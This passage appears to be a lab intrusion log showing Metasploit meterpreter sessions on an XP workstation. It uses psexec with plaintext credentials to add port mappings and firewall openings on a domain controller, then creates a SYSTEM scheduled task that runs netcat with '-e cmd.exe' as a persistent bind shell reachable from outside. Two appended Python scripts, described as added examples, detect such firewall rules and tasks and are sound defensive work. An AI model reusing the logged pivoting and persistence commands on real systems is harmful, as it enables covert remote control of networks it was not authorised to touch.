meterpreter >
meterpreter >
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > background
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter NT AUTHORITY\SYSTEM @ WKS-XP1 192.168.1.188:31337 -> 192.168.1.250:62571
msf exploit(handler) > sessions -i 1
[-] Invalid session identifier: 1
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 3 opened (192.168.1.188:31337 -> 192.168.1.250:61734)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 3
[-] The 'stdapi' extension has already been loaded.
meterpreter > pwd
C:\WINDOWS\TEMP
meterpreter > shell
Process 308 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999
psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999
The static port mapping from 192.168.1.188/9999 to 192.168.2.50/9999 requires 192.168.1.188 to be part of a configured address range. To define a static port mapping on this interface's assigned IP address, please specify 0.0.0.0 as the public address for the mapping.
netsh exited on srv-DC with error code 1.
/* I was trying to limit access to only wks-Matriux. It didn't work and it was too late at night to understand why, so I just set it to 0.0.0.0 */
C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999
psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999
netsh exited on srv-DC with error code 0.
/* OK, I think I now have portmapping and a firewall rule in place :) */
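Added example, not from the post: a Python audit of `netsh advfirewall firewall show rule name=all` output that flags broad inbound allow rules such as the jah-netcat rule added above. The sample output is constructed to match that command's layout, and the expected-port set is an assumption about the host being audited (here a domain controller).

```python
"""Parse `netsh advfirewall firewall show rule name=all` output and flag
inbound allow rules open to any remote address. Rules added by hand with
netsh carry no Grouping, unlike rules created by a Windows feature, which is
a cheap first filter when looking for holes punched into a host firewall."""
import re

# Constructed sample in the layout netsh prints; not captured from the lab.
SAMPLE_RULES = """\
Rule Name:                            Remote Desktop (TCP-In)
----------------------------------------------------------------------
Enabled:                              No
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Remote Desktop
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            jah-netcat
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            9999
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Active Directory Domain Controller - LDAP (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Active Directory Domain Services
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow
"""

# "Key:   value" lines; the key may contain a space ("Rule Name", "Edge traversal").
KEY_VALUE = re.compile(r"^([A-Za-z ]+):\s*(.*)$")


def parse_rules(text):
    """Split the netsh listing into one dict per rule, keyed by field name."""
    rules, current = [], None
    for line in text.splitlines():
        m = KEY_VALUE.match(line)
        if not m:
            continue  # dashed separators and blank lines
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Rule Name":
            current = {"Rule Name": value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def suspicious_rules(rules, expected_ports=frozenset()):
    """Return (rule name, reasons) for enabled inbound allow rules reachable
    from any remote address that are ungrouped or expose an unexpected port."""
    findings = []
    for r in rules:
        if (r.get("Enabled"), r.get("Direction"), r.get("Action")) != ("Yes", "In", "Allow"):
            continue
        if r.get("RemoteIP", "Any") != "Any":
            continue
        reasons = []
        port = r.get("LocalPort", "Any")
        if not r.get("Grouping"):
            reasons.append("no rule group: added by hand, not by a Windows feature")
        if port == "Any":
            reasons.append("every local port exposed")
        elif port not in expected_ports:
            reasons.append(f"local port {port} is not in the expected set")
        if reasons:
            findings.append((r["Rule Name"], reasons))
    return findings


if __name__ == "__main__":
    # Assumed baseline for a domain controller: LDAP is expected, 9999 is not.
    for name, reasons in suspicious_rules(parse_rules(SAMPLE_RULES), {"389"}):
        print(f"{name}: {'; '.join(reasons)}")
```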
C:\Program Files\ps>netsh
exit
exit
/* Hanging screwiness follows, had to terminate and re-establish session */
Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter > it
[-] Unknown command: it.
meterpreter > exit
[*] Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 4 opened (192.168.1.188:31337 -> 192.168.1.250:61737)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 4
[-] The 'stdapi' extension has already been loaded.
meterpreter > shell
Process 1008 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps
C:\Program Files\ps>netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
Ok.
/* This is adding the firewall opening to the local workstation. Netsh is different on XP. */
C:\Program Files\ps>schtasks /?
schtasks /?
SCHTASKS /parameter [arguments]
Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.
Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.
Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?
C:\Program Files\ps>schtasks /create /?
schtasks /create /?
SCHTASKS /Create [/S system [/U username [/P password]]]
[/RU username [/RP password]] /SC schedule [/MO modifier] [/D day]
[/I idletime] /TN taskname /TR taskrun [/ST starttime] [/M months]
[/SD startdate] [/ED enddate]
Description:
Enables an administrator to create scheduled tasks on a local or
remote systems.
Parameter List:
/S system Specifies the remote system to
connect to. If omitted the system
parameter defaults to the local
system.
/U username Specifies the user context under
which the command should execute.
/P password Specifies the password for the given
user context.
/RU username Specifies the user account (user
context) under which the task runs.
For the system account, valid values
are "", "NT AUTHORITY\SYSTEM" or
"SYSTEM".
/RP password Specifies the password for the user.
To prompt for the password, the value
must be either "*" or none.
Password will not effect for the
system account.
/SC schedule Specifies the schedule frequency.
Valid schedule types: MINUTE, HOURLY,
DAILY, WEEKLY, MONTHLY, ONCE,
ONSTART, ONLOGON, ONIDLE.
/MO modifier Refines the schedule type to allow
finer control over schedule
recurrence. Valid values are listed
in the "Modifiers" section below.
/D days Specifies the day of the week to run
the task. Valid values: MON, TUE,
WED, THU, FRI, SAT, SUN and for
MONTHLY schedules 1 - 31 (days of the
month).
/M months Specifies month(s) of the year.
Defaults to the first day of the
month. Valid values: JAN, FEB, MAR,
APR, MAY, JUN, JUL, AUG, SEP, OCT,
NOV, DEC.
/I idletime Specifies the amount of idle time to
wait before running a scheduled
ONIDLE task.
Valid range: 1 - 999 minutes.
/TN taskname Specifies a name which uniquely
identifies this scheduled task.
/TR taskrun Specifies the path and file name of
the program to be run by this
scheduled task.
Example: C:\windows\system32\calc.exe
/ST starttime Specifies the time to run the task.
The time format is HH:MM:SS (24 hour
time) for example, 14:30:00 for
2:30 PM.
/SD startdate Specifies the first date on which the
task runs. The format is
"mm/dd/yyyy".
/ED enddate Specifies the last date when the task
should run. The format is
"mm/dd/yyyy".
/? Displays this help/usage.
Modifiers: Valid values for the /MO switch per schedule type:
MINUTE: 1 - 1439 minutes.
HOURLY: 1 - 23 hours.
DAILY: 1 - 365 days.
WEEKLY: weeks 1 - 52.
ONCE: No modifiers.
ONSTART: No modifiers.
ONLOGON: No modifiers.
ONIDLE: No modifiers.
MONTHLY: 1 - 12, or
FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY.
Examples:
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN rtest2 /TR calc.exe /ST 12:00:00
/SD 10/20/2001 /ED 10/20/2001 /RU runasuser /RP
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN game
/TR c:\windows\system32\freecell
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC WEEKLY /TN test1 /TR notepad.exe
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN test2 /TR c:\windows\system32\notepad.exe
/ST 18:30:00 /RU runasuser /RP *
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN cell
/TR c:\windows\system32\freecell /RU runasuser
/* They don't give an example of how to pass arguments to a task or how to use a task path with spaces, thanks MS :| Experimentation is painful in the console with no tab completion. The easiest way to do this is to either use short pathnames (progra~1) or to create a batch file with your command line in it, then use the task to run that. */
C:\Program Files\ps>schtasks /?
schtasks /?
SCHTASKS /parameter [arguments]
Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.
Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.
Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?
C:\Program Files\ps>schtasks /change /?
schtasks /change /?
SCHTASKS /Change [/S system [/U username [/P password]]] {[/RU runasuser]
[/RP runaspassword] [/TR taskrun]} /TN taskname
Description:
Changes the program to run, or user account and password used
by a scheduled task.
Parameter List:
/S system Specifies the remote system to connect to.
/U username Specifies the user context under
which the command should execute.
/P password Specifies the password for the given
user context.
/RU username Changes the user name (user context) under
which the scheduled task has to run.
For the system account, valid values are
"", "NT AUTHORITY\SYSTEM" or "SYSTEM".
/RP password Specifies a new password for the existing
user context or the password for a new
user account. Password will not effect for
the system account.
/TR taskrun Specifies a new program that the scheduled
task runs. Type the path and file name of
the program.
/TN taskname Specifies which scheduled task to change.
/? Displays this help/usage.
Examples:
SCHTASKS /Change /RP password /TN "Backup and Restore"
SCHTASKS /Change /TR restore.exe /TN "Start Restore"
SCHTASKS /Change /S system /U user /P password /RU newuser
/TN "Start Backup"
C:\Program Files\ps>schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"
schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"
INFO: The Schedule Task "listen" will be created under user name ("NT AUTHORITY\SYSTEM").
SUCCESS: The scheduled task "listen" has successfully been created.
C:\Program Files\ps>exit
meterpreter > exit
[*] Meterpreter session 4 closed. Reason: User exit
msf exploit(handler) >
/* After all this, I had successfully set up:
- portmapping on srv-DC - 192.168.2.1:9999 -> 192.168.2.50:9999
- firewall rule on srv-DC - allow tcp from any to any 9999 in
- firewall rule on wks-xp1 - allow tcp from any to any 9999 in
- task scheduled to run netcat (as system) at logon, listen on 9999 and provide a command shell to any connection.
I tested this and can now successfully connect from outside the gateway: nc -nvv 192.168.1.250 9999 (srv-DC OutsideNIC) */
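The scheduled-task leg of the chain above (the SCHTASKS /Create syntax from the help output, and the "listen" task in the summary) is also the part a defender can catch with a plain inventory. The script below is an added example, not something from the original post or from Sysinternals/Microsoft: it audits the CSV that `schtasks /Query /FO CSV /V` exports and flags tasks that look like the one created here, i.e. a SYSTEM task on a logon/startup trigger that launches a listener tool with `-e cmd.exe`, runs from an 8.3 short path, or lives in a temp directory. The sample export, the column names it keys on, and the heuristics are assumptions made for the example, so check them against a real export from the Windows version you care about before relying on the column mapping.

```python
"""Audit a `schtasks /Query /FO CSV /V` export for tasks that resemble a
scheduled bind-shell listener (SYSTEM + logon trigger + listener tool).

Added example; the sample rows and column names below are constructed and
assumed to match the verbose CSV export, not copied from a real system.
"""
import csv
import io
import re

# Constructed sample export: one benign vendor task, one task shaped like the
# "listen" task described above, and one SYSTEM task running out of TEMP.
SAMPLE_EXPORT = """\
"HostName","TaskName","Next Run Time","Status","Schedule Type","Task To Run","Run As User"
"WKS-XP1","AcmeUpdater","14:00:00, 10/21/2010","","Daily","C:\\Program Files\\Acme\\updater.exe /quiet","WKS-XP1\\usr1"
"WKS-XP1","listen","At logon time","","At logon time","C:\\Progra~1\\ps\\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe","NT AUTHORITY\\SYSTEM"
"WKS-XP1","svc","At system start up","","At system startup","C:\\WINDOWS\\TEMP\\updchk.exe","SYSTEM"
"""

# Account strings SCHTASKS accepts for the system account (see /RU in the help).
SYSTEM_ACCOUNTS = {"", "system", "nt authority\\system"}
# Triggers that fire without anyone scheduling a time: ONSTART / ONLOGON.
BOOT_OR_LOGON = re.compile(r"logon|start ?up|onstart|onlogon", re.I)
# Tools that open a listening socket and relay it somewhere (assumed list).
LISTENER_TOOLS = re.compile(r"\b(nc|ncat|netcat|nc64|socat)(\.exe)?\b", re.I)
# The "-e <shell>" handoff that turns a listener into a command shell.
SHELL_HANDOFF = re.compile(r"-e\s+(cmd|powershell|command)(\.exe)?\b", re.I)
# 8.3 short names such as PROGRA~1, used to avoid quoting paths with spaces.
SHORT_NAME = re.compile(r"~\d")
TEMP_PATH = re.compile(r"\\temp\\|%temp%|\\tmp\\", re.I)
# Programs under system32 are the usual home of legitimate SYSTEM tasks.
SAFE_DIRS = re.compile(r"^\"?c:\\windows\\system32\\", re.I)


def _field(row, *names):
    """Look up a column by any of several header spellings, case-insensitively."""
    lookup = {k.strip().lower(): v for k, v in row.items() if k}
    for name in names:
        value = lookup.get(name.lower())
        if value is not None:
            return value.strip()
    return ""


def score_task(row):
    """Return the task's identity plus a list of reasons it looks suspicious."""
    name = _field(row, "TaskName")
    cmd = _field(row, "Task To Run")
    user = _field(row, "Run As User")
    trigger = _field(row, "Schedule Type", "Scheduled Type", "Schedule")
    reasons = []
    as_system = user.lower() in SYSTEM_ACCOUNTS
    at_boot = bool(BOOT_OR_LOGON.search(trigger))
    if LISTENER_TOOLS.search(cmd):
        reasons.append("launches a network listener/relay tool")
    if SHELL_HANDOFF.search(cmd):
        reasons.append("hands a shell to whoever connects (-e cmd.exe)")
    if as_system and at_boot and not SAFE_DIRS.match(cmd):
        reasons.append("runs as SYSTEM at boot/logon from a non-system path")
    if SHORT_NAME.search(cmd):
        reasons.append("uses an 8.3 short path (hides the real directory name)")
    if TEMP_PATH.search(cmd):
        reasons.append("executable lives in a temp directory")
    return {"task": name, "run_as": user, "command": cmd, "reasons": reasons}


def audit_tasks(csv_text):
    """Parse a verbose SCHTASKS CSV export and return only the flagged tasks."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        result = score_task(row)
        if result["reasons"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    # On a live host: schtasks /Query /FO CSV /V > tasks.csv, then feed that file.
    for finding in audit_tasks(SAMPLE_EXPORT):
        print(f"[!] {finding['task']} (as {finding['run_as'] or 'SYSTEM'}): {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

The benign updater row produces no findings, the "listen"-style task trips four checks, and the TEMP-resident SYSTEM task trips two; a real export can be piped in from `schtasks /Query /FO CSV /V` on the host being reviewed.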